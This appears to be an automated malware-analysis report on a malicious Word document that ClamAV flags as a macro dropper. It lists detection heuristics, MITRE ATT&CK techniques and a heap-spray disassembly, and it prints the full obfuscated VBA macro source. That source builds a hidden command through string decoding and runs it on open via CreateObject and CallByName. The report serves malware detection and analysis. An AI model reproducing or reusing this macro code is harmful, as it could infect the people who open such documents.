MALICIOUS
290
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1140 Deobfuscate or Obfuscate Malicious Files or Information
The sample is a malicious Office document containing VBA macros. The 'AutOOpen' macro is designed to execute automatically when the document is opened, and the 'SE_ENABLE_LURE' heuristic indicates the document prompts the user to enable macros. The VBA code appears to be obfuscated, but the presence of 'CreateObject' and 'CallByName' suggests it's attempting to execute code, likely to download and run a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6481603-0' further supports its nature as a dropper.
Heuristics 10
-
ClamAV: Doc.Dropper.Agent-6481603-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6481603-0
-
Heap-spray pattern detected high SC_HEAP_SPRAYRepeated 0x04 bytes found
Disassembly
Attempted x86 opcode disassembly000016C6 0404 add al, 4 000016C8 0404 add al, 4 000016CA 0404 add al, 4 000016CC 0404 add al, 4 000016CE 0404 add al, 4 000016D0 0404 add al, 4 000016D2 0404 add al, 4 000016D4 0404 add al, 4 000016D6 0404 add al, 4 000016D8 0404 add al, 4 000016DA 0404 add al, 4 000016DC 0404 add al, 4 000016DE 0404 add al, 4 000016E0 0404 add al, 4 000016E2 0404 add al, 4 000016E4 0404 add al, 4 000016E6 0404 add al, 4 000016E8 0404 add al, 4 000016EA 0404 add al, 4 000016EC 0404 add al, 4 000016EE 0404 add al, 4 000016F0 0404 add al, 4 000016F2 0404 add al, 4 000016F4 0404 add al, 4 000016F6 0404 add al, 4 000016F8 0404 add al, 4 000016FA 0404 add al, 4 000016FC 0404 add al, 4 000016FE 0404 add al, 4 00001700 0404 add al, 4 00001702 0404 add al, 4 00001704 0404 add al, 4 00001706 0404 add al, 4 00001708 0404 add al, 4 0000170A 0404 add al, 4 0000170C 0404 add al, 4 0000170E 0404 add al, 4 00001710 0404 add al, 4 00001712 0404 add al, 4 00001714 0404 add al, 4 00001716 0404 add al, 4 00001718 0404 add al, 4 0000171A 0404 add al, 4 0000171C 0404 add al, 4 0000171E 0404 add al, 4 00001720 0404 add al, 4 00001722 0404 add al, 4 00001724 0404 add al, 4
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Private Sub paulstorm_Change() Set guilecla = CreateObject(tunzhuan) volvos70 = 87 * 16 -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
mn1 = True CallByName emera777, mn, VbMethod, sitiakuloP.paulstorm, mn0, mn1 End Sub -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutOOpen() pataccess -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7236 bytes |
SHA-256: b425dd209cb76dcf045c9bed4a930e552a16739873f96c9d74b9f0db6b2f2c32 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
pataccess
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
End Sub
Attribute VB_Name = "anilichs"
Function tunzhuan()
tunzhuan = ssegold1976
End Function
Function ssegold1976()
ssegold1976 = green3721(avosamenA.smarailg)
End Function
Function love123123()
love123123 = avonikhsaH.melissa158
End Function
Function gasmypoa(deenheit, diedligh)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
gasmypoa = green3721(sitiakuloP.yeahconnie) + deenheit + green3721(avosamenA.October100) + _
diedligh + green3721(sitiakuloP.linkskiing + sitiakuloP.ausjurer) + diedligh
End Function
Function redskin158()
redskin158 = "u.iaoghgEmaQRQai.uipEs/l"
End Function
Function golfroyals(AVORESSAB)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
golfroyals = green3721(wizard1971 + avosamenA.dreamdell) + AVORESSAB + _
green3721(avosamenA.avonayvele) + AVORESSAB + green3721(avonikhsaH.KONETEVS)
End Function
Sub sofiaaspasia(emera777)
mn = "Run"
mn0 = 0
mn1 = True
CallByName emera777, mn, VbMethod, sitiakuloP.paulstorm, mn0, mn1
End Sub
Function ANIBELAKHS()
ANIBELAKHS = sitiakuloP.loner_ru
End Function
Function green3721(pubitive)
wayact53 = ""
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
roupier43 = Len(pubitive)
For cjverm78 = 1 To roupier43
pat52082 = 108 + 97
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
wayact53 = wayact53 + duchylau(SOUTH407(pubitive, cjverm78), 4)
Next cjverm78
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
green3721 = wayact53
End Function
Function acTpoJIep(ziggysurf)
GHJYBWFN = robin459(9, 4) - 1
staivou5 = robin459(53, 1)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
love2582 = SOUTH407(love123123, staivou5)
For janearse = 2 To GHJYBWFN
staivou5 = robin459(27, 1)
pat52082 = 108 + 97
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
love2582 = love2582 + SOUTH407(ziggysurf, staivou5)
Next janearse
staivou5 = robin459(37, 1)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
acTpoJIep = ANIGREVOS(love2582, staivou5)
End Function
Attribute VB_Name = "avonikhsaH"
Attribute VB_Base = "0{C45A907D-3A63-4B6E-B210-20B309999378}{99CFF111-9347-474B-A9BC-83E074BC80B1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub pamat7007_Change()
mikefuckme = acTpoJIep(carlfaith)
wqsbsteph = acTpoJIep(carlfaith)
HCIVOKHCIRTEP = acTpoJIep(osuucoos)
insidepa = acTpoJIep(osuucoos)
kathypercy = 89 + 32
kathypercy = 124 - 2
kathypercy = 74 * 139 + 17 + 7
kathypercy = kathypercy * 143 - 7
kathypercy = 5 - 89 - 13
oker1506 mikefuckme, wqsbsteph, HCIVOKHCIRTEP, insidepa
End Sub
Attribute VB_Name = "avosamenA"
Attribute VB_Base = "0{EEA0A116-C6C3-4531-9ECA-A3C133286C9D}{50C45D01-88EA-405E-90C0-96E7AF5936EE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "gb102456"
Function carlfaith()
carlfaith = avosamenA.canonbozo
End Function
Function osuucoos()
osuucoos = sitiakuloP.avonamsI
End Function
Sub pataccess()
Randomize
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
avonikhsaH.pamat7007 = "inosenig"
End Sub
Function saintbit(ftpgandalf, helpmeandy)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
saintbit = green3721(avosamenA.apodpani) + helpmeandy + green3721(avosamenA.eucarevi) + _
helpmeandy + green3721(avosamenA.rubygalaxy) + ftpgandalf + _
green3721(avosamenA.hvfdbh2018 + redskin158 + avosamenA.champsshit) + ftpgandalf + green3721(avosamenA.hvfdbh2018)
End Function
Function frontrugby()
frontrugby = avonikhsaH.password34
End Function
Function duchylau(applescout As String, blade333 As Integer) As String
Dim boufulad As Integer
boufulad = 0
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
For NELATNAP = 1 To 90
If (SOUTH407(frontrugby, NELATNAP) = applescout) Then
boufulad = NELATNAP
pat52082 = 108 + 97
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
Exit For
End If
Next NELATNAP
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
boufulad = IIf(boufulad - blade333 <= 0, 90 + boufulad - blade333, boufulad - blade333)
duchylau = SOUTH407(frontrugby, boufulad)
End Function
Function wizard1971()
wizard1971 = "smhoaiuEmaQE,uRQai.uipEs/l"
End Function
Function robin459(amuvampl, tOiRFJAxa)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
robin459 = ornchlol(Int((amuvampl * Rnd()) + tOiRFJAxa))
End Function
Function ornchlol(sertnanc)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
ornchlol = CInt(sertnanc)
End Function
Function oker1506(damian09, VEHSIBAK, udredboss, binkymegan)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
sitiakuloP.paulstorm = gasmypoa(damian09, VEHSIBAK) + saintbit(damian09, udredboss) + golfroyals(binkymegan)
End Function
Function SOUTH407(drolterr, bullorion)
SOUTH407 = Mid(drolterr, bullorion, 1)
End Function
Function ANIGREVOS(future200, Balumba)
ANIGREVOS = future200 + SOUTH407(ANIBELAKHS, Balumba)
End Function
Attribute VB_Name = "sitiakuloP"
Attribute VB_Base = "0{B541ABA7-4ECE-4CAF-94C0-153F68C799EB}{3ADA21AA-DA0E-48BB-B83B-451C8052760B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CheckBox1_Click()
MsgBox "Ok"
End Sub
Private Sub CommandButton1_Click()
MsgBox "Ok"
End Sub
Private Sub Label1_Click()
MsgBox "Ok"
End Sub
Private Sub paulstorm_Change()
Set guilecla = CreateObject(tunzhuan)
volvos70 = 87 * 16
volvos70 = volvos70 - volvos7
volvos70 = 97 * 142 - 2 - 63 - 10
volvos70 = volvos70 * volvos7
sofiaaspasia guilecla
End Sub
Private Sub ToggleButton1_Click()
MsgBox "Ok"
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.